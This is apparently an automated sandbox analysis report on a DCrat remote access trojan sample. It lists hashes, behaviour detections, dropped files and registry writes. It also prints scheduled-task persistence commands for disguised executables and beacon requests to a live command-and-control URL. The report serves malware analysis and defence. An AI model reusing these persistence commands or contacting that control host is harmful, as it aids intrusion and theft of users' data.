File name: taskHostw.exe

Full analysis: https://app.any.run/tasks/8734e9c2-f20e-4664-a213-e7976317d0c2
Verdict: Malicious activity
Threats:

DCrat, also known as Dark Crystal RAT, is a remote access trojan (RAT) first seen in 2018. It is modular malware that can be customized to perform different tasks; for instance, it can steal passwords and crypto wallet information, hijack Telegram and Steam accounts, and more. Attackers distribute DCrat through a variety of methods, but phishing email campaigns are the most common.

Analysis date: January 23, 2025, 15:44:39
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags: rat, dcrat, remote, darkcrystal, netreactor, stealer
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, 6 sections
MD5: 9ACAC2F1709100C4F471C5C4D9A6559A
SHA1: B0DE7B3D1340BB3EDC9B67A6AE2BE9D25F1E6172
SHA256: E7FE25F706806440E04205B7FBE8C4DC0BEF064327770B7BA7682917090509F5
SSDEEP: 24576:HZPrK87M5rSv0lvPZsmOIjWCqY3HYkGkt26yfs/kqiAbqOKy2:HFrKj5G0lvh5OWWC46yfkTiAbqOKy2

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Uses sleep, probably for detection evasion (SCRIPT)

      • wscript.exe (PID: 6576)
    • Actions look like stealing of personal data

      • dasHost.exe (PID: 5256)
    • DCRAT mutex has been found

      • dasHost.exe (PID: 5256)
    • DARKCRYSTAL has been detected (SURICATA)

      • dasHost.exe (PID: 5256)
    • DCRAT has been detected (YARA)

      • dasHost.exe (PID: 5256)
  • SUSPICIOUS

    • Reads security settings of Internet Explorer

      • taskHostw.exe (PID: 6484)
      • Bridgebrokerperf.exe (PID: 7024)
    • Executable content was dropped or overwritten

      • taskHostw.exe (PID: 6484)
      • Bridgebrokerperf.exe (PID: 7024)
    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 6576)
    • Starts CMD.EXE for command execution

      • wscript.exe (PID: 6576)
      • Bridgebrokerperf.exe (PID: 7024)
    • Executing commands from a ".bat" file

      • wscript.exe (PID: 6576)
      • Bridgebrokerperf.exe (PID: 7024)
    • The process creates files with names similar to system file names

      • Bridgebrokerperf.exe (PID: 7024)
    • Executed via WMI

      • schtasks.exe (PID: 7132)
      • schtasks.exe (PID: 7152)
      • schtasks.exe (PID: 3816)
      • schtasks.exe (PID: 6220)
      • schtasks.exe (PID: 6388)
      • schtasks.exe (PID: 3952)
      • schtasks.exe (PID: 5788)
      • schtasks.exe (PID: 4996)
      • schtasks.exe (PID: 6236)
      • schtasks.exe (PID: 4872)
      • schtasks.exe (PID: 6284)
      • schtasks.exe (PID: 6400)
      • schtasks.exe (PID: 6384)
      • schtasks.exe (PID: 6356)
      • schtasks.exe (PID: 6336)
      • schtasks.exe (PID: 6332)
      • schtasks.exe (PID: 6360)
      • schtasks.exe (PID: 3984)
      • schtasks.exe (PID: 5268)
      • schtasks.exe (PID: 4308)
      • schtasks.exe (PID: 6212)
      • schtasks.exe (PID: 4716)
      • schtasks.exe (PID: 6016)
      • schtasks.exe (PID: 3364)
    • Probably delays execution using 'w32tm.exe'

      • cmd.exe (PID: 624)
    • Reads the date of Windows installation

      • Bridgebrokerperf.exe (PID: 7024)
    • Reads browser cookies

      • cmd.exe (PID: 624)
    • There is functionality for taking screenshots (YARA)

      • dasHost.exe (PID: 5256)
  • INFO

    • Drops encrypted VBS script (Microsoft Script Encoder)

      • taskHostw.exe (PID: 6484)
    • Reads the computer name

      • taskHostw.exe (PID: 6484)
      • Bridgebrokerperf.exe (PID: 7024)
      • dasHost.exe (PID: 5256)
    • Checks supported languages

      • taskHostw.exe (PID: 6484)
      • Bridgebrokerperf.exe (PID: 7024)
      • dasHost.exe (PID: 5256)
    • Process checks computer location settings

      • taskHostw.exe (PID: 6484)
      • Bridgebrokerperf.exe (PID: 7024)
    • The process uses the downloaded file

      • taskHostw.exe (PID: 6484)
      • wscript.exe (PID: 6576)
      • Bridgebrokerperf.exe (PID: 7024)
    • Reads Environment values

      • Bridgebrokerperf.exe (PID: 7024)
    • Reads the machine GUID from the registry

      • Bridgebrokerperf.exe (PID: 7024)
      • dasHost.exe (PID: 5256)
    • Failed to create an executable file in Windows directory

      • Bridgebrokerperf.exe (PID: 7024)
    • Creates files in a temporary directory

      • Bridgebrokerperf.exe (PID: 7024)
    • .NET Reactor protector has been detected

      • dasHost.exe (PID: 5256)
No Malware configuration.

TRiD

.exe | Win32 Executable (generic) (52.9)
.exe | Generic Win/DOS Executable (23.5)
.exe | DOS Executable Generic (23.5)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2020:12:01 18:00:55+00:00
ImageFileCharacteristics: Executable, 32-bit
PEType: PE32
LinkerVersion: 14
CodeSize: 201216
InitializedDataSize: 255488
UninitializedDataSize: -
EntryPoint: 0x1ec40
OSVersion: 5.1
ImageVersion: -
SubsystemVersion: 5.1
Subsystem: Windows GUI
All screenshots are available in the full report
Total processes: 151
Monitored processes: 33
Malicious processes: 6
Suspicious processes: 0

Behavior graph

start taskhostw.exe wscript.exe no specs cmd.exe no specs conhost.exe no specs bridgebrokerperf.exe schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs cmd.exe no specs conhost.exe no specs w32tm.exe no specs #DARKCRYSTAL dashost.exe

Process information

PID: 624
CMD: C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\85dXevlLtp.bat" "
Path: C:\Windows\System32\cmd.exe
Parent process: Bridgebrokerperf.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
PID: 1804
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 3364
CMD: schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 6 /tr "'C:\webfontSessionBrokerHost\TextInputHost.exe'" /f
Path: C:\Windows\System32\schtasks.exe
Parent process: WmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Task Scheduler Configuration Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 3816
CMD: schtasks.exe /create /tn "dasHostd" /sc MINUTE /mo 12 /tr "'C:\Users\Default\Cookies\dasHost.exe'" /rl HIGHEST /f
Path: C:\Windows\System32\schtasks.exe
Parent process: WmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Task Scheduler Configuration Tool
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 3952
CMD: schtasks.exe /create /tn "ctfmonc" /sc MINUTE /mo 12 /tr "'C:\webfontSessionBrokerHost\ctfmon.exe'" /f
Path: C:\Windows\System32\schtasks.exe
Parent process: WmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Task Scheduler Configuration Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 3984
CMD: schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 14 /tr "'C:\webfontSessionBrokerHost\OfficeClickToRun.exe'" /rl HIGHEST /f
Path: C:\Windows\System32\schtasks.exe
Parent process: WmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Task Scheduler Configuration Tool
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 4308
CMD: schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\webfontSessionBrokerHost\OfficeClickToRun.exe'" /rl HIGHEST /f
Path: C:\Windows\System32\schtasks.exe
Parent process: WmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Task Scheduler Configuration Tool
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 4716
CMD: schtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\webfontSessionBrokerHost\TextInputHost.exe'" /rl HIGHEST /f
Path: C:\Windows\System32\schtasks.exe
Parent process: WmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Task Scheduler Configuration Tool
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 4872
CMD: schtasks.exe /create /tn "MoUsoCoreWorkerM" /sc MINUTE /mo 13 /tr "'C:\webfontSessionBrokerHost\MoUsoCoreWorker.exe'" /rl HIGHEST /f
Path: C:\Windows\System32\schtasks.exe
Parent process: WmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Task Scheduler Configuration Tool
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 4996
CMD: schtasks.exe /create /tn "UserOOBEBrokerU" /sc MINUTE /mo 9 /tr "'C:\Users\Default\Documents\My Pictures\UserOOBEBroker.exe'" /rl HIGHEST /f
Path: C:\Windows\System32\schtasks.exe
Parent process: WmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Task Scheduler Configuration Tool
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events: 4 188
Read events: 4 171
Write events: 17
Delete events: 0

Modification events

(PID) Process: (6484) taskHostw.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.vbe\OpenWithProgids
Operation: write
Name: VBEFile
Value:

(PID) Process: (7024) Bridgebrokerperf.exe
Key: HKEY_CURRENT_USER\SOFTWARE\1d13ccc827c06c3f10085430bdd48b97e2b4b945
Operation: write
Name: 9dada1c28716a69b2759b57224a22f86ed6d3b82
Value:

(PID) Process: (5256) dasHost.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dasHost_RASAPI32
Operation: write
Name: EnableFileTracing
Value: 0

(PID) Process: (5256) dasHost.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dasHost_RASAPI32
Operation: write
Name: EnableAutoFileTracing
Value: 0

(PID) Process: (5256) dasHost.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dasHost_RASAPI32
Operation: write
Name: EnableConsoleTracing
Value: 0

(PID) Process: (5256) dasHost.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dasHost_RASAPI32
Operation: write
Name: FileTracingMask
Value:

(PID) Process: (5256) dasHost.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dasHost_RASAPI32
Operation: write
Name: ConsoleTracingMask
Value:

(PID) Process: (5256) dasHost.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dasHost_RASAPI32
Operation: write
Name: MaxFileSize
Value: 1048576

(PID) Process: (5256) dasHost.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dasHost_RASAPI32
Operation: write
Name: FileDirectory
Value: %windir%\tracing

(PID) Process: (5256) dasHost.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dasHost_RASMANCS
Operation: write
Name: EnableFileTracing
Value: 0
Executable files: 10
Suspicious files: 3
Text files: 12
Unknown types: 0

Dropped files

PID: 7024 | Process: Bridgebrokerperf.exe | Filename: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\dasHost.exe | Type: executable
MD5: 1465B464FF78A41CF8AF12D58CA62588
SHA256: 485228DC5BFEB7694133FD50861F0C48F314003F8EE1030DB3D063D07930BD3A

PID: 6484 | Process: taskHostw.exe | Filename: C:\webfontSessionBrokerHost\Ur1NipdNxN.vbe | Type: binary
MD5: 56F8DFB763248F67943AFCC431C9A28C
SHA256: DB5202ACF3A53D23F14FAA846E27C2415CB33C26B5AC151A298209A0E7A1E4AC

PID: 7024 | Process: Bridgebrokerperf.exe | Filename: C:\webfontSessionBrokerHost\ctfmon.exe | Type: executable
MD5: 1465B464FF78A41CF8AF12D58CA62588
SHA256: 485228DC5BFEB7694133FD50861F0C48F314003F8EE1030DB3D063D07930BD3A

PID: 7024 | Process: Bridgebrokerperf.exe | Filename: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\21b1a557fd31cc | Type: text
MD5: F9089D7041F08947052617FB74C7391A
SHA256: 54A2AC9BDC3DA6F1969EE5D89AC361103A13A78680EBE5508E988EC373E885E0

PID: 7024 | Process: Bridgebrokerperf.exe | Filename: C:\Users\Default\Pictures\7ccfebd9e92364 | Type: text
MD5: FD327AD794DBA3A476BFD2E3C1E5823F
SHA256: C638172460AC304DA20E285B7AB9E96FBE8C4282B80DF0902201B44BECE60B33

PID: 5256 | Process: dasHost.exe | Filename: C:\ProgramData\USOPrivate\UpdateStore\store.db | Type:
MD5:
SHA256:

PID: 7024 | Process: Bridgebrokerperf.exe | Filename: C:\webfontSessionBrokerHost\fontdrvhost.exe | Type: executable
MD5: 1465B464FF78A41CF8AF12D58CA62588
SHA256: 485228DC5BFEB7694133FD50861F0C48F314003F8EE1030DB3D063D07930BD3A

PID: 7024 | Process: Bridgebrokerperf.exe | Filename: C:\webfontSessionBrokerHost\MoUsoCoreWorker.exe | Type: executable
MD5: 1465B464FF78A41CF8AF12D58CA62588
SHA256: 485228DC5BFEB7694133FD50861F0C48F314003F8EE1030DB3D063D07930BD3A

PID: 6484 | Process: taskHostw.exe | Filename: C:\webfontSessionBrokerHost\SpdD9zKqJDT3l.bat | Type: text
MD5: 37E781C64E1E5057220CC587925258D4
SHA256: 24510BBFD8F20C029B17D88853E82DBC2D2637B52DC76BE8CEEBF57243CAC344

PID: 7024 | Process: Bridgebrokerperf.exe | Filename: C:\webfontSessionBrokerHost\dllhost.exe | Type: executable
MD5: 1465B464FF78A41CF8AF12D58CA62588
SHA256: 485228DC5BFEB7694133FD50861F0C48F314003F8EE1030DB3D063D07930BD3A
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 108
TCP/UDP connections: 21
DNS requests: 7
Threats: 1

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4712
MoUsoCoreWorker.exe
GET
200
23.53.40.178:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
4536
svchost.exe
GET
200
23.53.40.178:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
4536
svchost.exe
GET
200
23.52.120.96:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
23.52.120.96:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
5256
dasHost.exe
GET
200
5.101.153.201:80
http://ppasovtv.beget.tech/L1nc0In.php?xn8=zs4N37VYMTptGw62zT&37IJOxYMzhLoGhvPq=6sCeI18&ZBC44OeGElriqZfuf0AoiLUhPr2l=ZzRLVYWJ4n6KAcKi&598ffaf2ae5671a374e7b5f5bfa3e00a=AN4UjZyQWMjFjMhZDO3I2MhVzNzUjYzADN2kTOiNmN1gjZmJmZwIjZ3QTM5UjN4gDMyITOyIDO&d40967e42e49cc99f8f4737461f68248=gZwQDZzMjY5IGZmFmM2kjMlR2NwQDM2YTO1QWO0E2M0QWZwMTNkNWZ&b59bfcc0d57f99bb2fa0b2e32b69c919=0VfiIiOiQGOygTMjFWNhJDZkNWMlZmYwIDM1ATM0Y2NmlTO3YWZiwiI4AzYkFzYyQWMmJGNxITZllTNhJTZmFzNxgzYxEmY0QWYkdDZ5gTO2IiOiEmNxcTOwMGNzYGOxEGZ5QWZ0M2N0ITN5EDM4AzM1QmZiwiI3IDN4czY3ATN2EjM2YGNjVWO0kzN1MDM5QDMiRDO5gDNwUGN1U2MhJiOigzYhBjZxczN4ITY4EDOxkDOzYjM3MzM3YjYzMmMlVjNis3W
unknown
whitelisted
5256
dasHost.exe
GET
200
5.101.153.201:80
http://ppasovtv.beget.tech/L1nc0In.php?xn8=zs4N37VYMTptGw62zT&37IJOxYMzhLoGhvPq=6sCeI18&ZBC44OeGElriqZfuf0AoiLUhPr2l=ZzRLVYWJ4n6KAcKi&598ffaf2ae5671a374e7b5f5bfa3e00a=AN4UjZyQWMjFjMhZDO3I2MhVzNzUjYzADN2kTOiNmN1gjZmJmZwIjZ3QTM5UjN4gDMyITOyIDO&d40967e42e49cc99f8f4737461f68248=gZwQDZzMjY5IGZmFmM2kjMlR2NwQDM2YTO1QWO0E2M0QWZwMTNkNWZ&565015d3235842a2ec38a93523e57197=
unknown
whitelisted
5256
dasHost.exe
GET
200
5.101.153.201:80
http://ppasovtv.beget.tech/L1nc0In.php?gMS8R0TTNrfpMV2m=wZXUAIllMEditJ8HNWYLah&df20dbcdf815a7f1fcc21b05ecb0bc52=a447e0ec211c9a451aab62e84acf4a0d&d40967e42e49cc99f8f4737461f68248=wNlhjZycjZ5Y2YxMDNiZjNmNjNwQmY4kDOkNWY4MWMjdjNhhzMyUTY&gMS8R0TTNrfpMV2m=wZXUAIllMEditJ8HNWYLah
unknown
whitelisted
5256
dasHost.exe
GET
200
5.101.153.201:80
http://ppasovtv.beget.tech/L1nc0In.php?xn8=zs4N37VYMTptGw62zT&37IJOxYMzhLoGhvPq=6sCeI18&ZBC44OeGElriqZfuf0AoiLUhPr2l=ZzRLVYWJ4n6KAcKi&598ffaf2ae5671a374e7b5f5bfa3e00a=AN4UjZyQWMjFjMhZDO3I2MhVzNzUjYzADN2kTOiNmN1gjZmJmZwIjZ3QTM5UjN4gDMyITOyIDO&d40967e42e49cc99f8f4737461f68248=gZwQDZzMjY5IGZmFmM2kjMlR2NwQDM2YTO1QWO0E2M0QWZwMTNkNWZ&2b0ec457d6393348e60633ec46b0c081=d1nIxMzYjVWOzIWMjNTM5UmZxUzMzgjNxQWMiVjYjVzMhVmMxkTM1QWYyIiOiEmNxcTOwMGNzYGOxEGZ5QWZ0M2N0ITN5EDM4AzM1QmZiwiI3IDN4czY3ATN2EjM2YGNjVWO0kzN1MDM5QDMiRDO5gDNwUGN1U2MhJiOigzYhBjZxczN4ITY4EDOxkDOzYjM3MzM3YjYzMmMlVjNis3W&b59bfcc0d57f99bb2fa0b2e32b69c919=
unknown
whitelisted
5256
dasHost.exe
GET
200
5.101.153.201:80
http://ppasovtv.beget.tech/L1nc0In.php?xn8=zs4N37VYMTptGw62zT&37IJOxYMzhLoGhvPq=6sCeI18&ZBC44OeGElriqZfuf0AoiLUhPr2l=ZzRLVYWJ4n6KAcKi&598ffaf2ae5671a374e7b5f5bfa3e00a=AN4UjZyQWMjFjMhZDO3I2MhVzNzUjYzADN2kTOiNmN1gjZmJmZwIjZ3QTM5UjN4gDMyITOyIDO&d40967e42e49cc99f8f4737461f68248=gZwQDZzMjY5IGZmFmM2kjMlR2NwQDM2YTO1QWO0E2M0QWZwMTNkNWZ&2b0ec457d6393348e60633ec46b0c081=d1nIxMzYjVWOzIWMjNTM5UmZxUzMzgjNxQWMiVjYjVzMhVmMxkTM1QWYyIiOiEmNxcTOwMGNzYGOxEGZ5QWZ0M2N0ITN5EDM4AzM1QmZiwiI3IDN4czY3ATN2EjM2YGNjVWO0kzN1MDM5QDMiRDO5gDNwUGN1U2MhJiOigzYhBjZxczN4ITY4EDOxkDOzYjM3MzM3YjYzMmMlVjNis3W&b59bfcc0d57f99bb2fa0b2e32b69c919=
unknown
whitelisted
5256
dasHost.exe
GET
200
5.101.153.201:80
http://ppasovtv.beget.tech/L1nc0In.php?xn8=zs4N37VYMTptGw62zT&37IJOxYMzhLoGhvPq=6sCeI18&ZBC44OeGElriqZfuf0AoiLUhPr2l=ZzRLVYWJ4n6KAcKi&598ffaf2ae5671a374e7b5f5bfa3e00a=AN4UjZyQWMjFjMhZDO3I2MhVzNzUjYzADN2kTOiNmN1gjZmJmZwIjZ3QTM5UjN4gDMyITOyIDO&d40967e42e49cc99f8f4737461f68248=gZwQDZzMjY5IGZmFmM2kjMlR2NwQDM2YTO1QWO0E2M0QWZwMTNkNWZ&2b0ec457d6393348e60633ec46b0c081=d1nIxMzYjVWOzIWMjNTM5UmZxUzMzgjNxQWMiVjYjVzMhVmMxkTM1QWYyIiOiEmNxcTOwMGNzYGOxEGZ5QWZ0M2N0ITN5EDM4AzM1QmZiwiI3IDN4czY3ATN2EjM2YGNjVWO0kzN1MDM5QDMiRDO5gDNwUGN1U2MhJiOigzYhBjZxczN4ITY4EDOxkDOzYjM3MzM3YjYzMmMlVjNis3W&b59bfcc0d57f99bb2fa0b2e32b69c919=
unknown
whitelisted

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:138
whitelisted
4.231.128.59:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4712
MoUsoCoreWorker.exe
4.231.128.59:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
2.16.110.138:443
Akamai International B.V.
DE
unknown
4536
svchost.exe
4.231.128.59:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4712
MoUsoCoreWorker.exe
23.53.40.178:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
4536
svchost.exe
23.53.40.178:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
4536
svchost.exe
23.52.120.96:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
4712
MoUsoCoreWorker.exe
23.52.120.96:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
4712
MoUsoCoreWorker.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted

DNS requests

Domain
IP
Reputation
google.com
  • 142.250.181.238
whitelisted
crl.microsoft.com
  • 23.53.40.178
  • 23.53.40.176
whitelisted
www.microsoft.com
  • 23.52.120.96
whitelisted
settings-win.data.microsoft.com
  • 51.104.136.2
  • 51.124.78.146
whitelisted
ppasovtv.beget.tech
  • 5.101.153.201
whitelisted
self.events.data.microsoft.com
  • 20.44.10.123
whitelisted

Threats

PID
Process
Class
Message
5256
dasHost.exe
A Network Trojan was detected
ET MALWARE DCRAT Activity (GET)
No debug info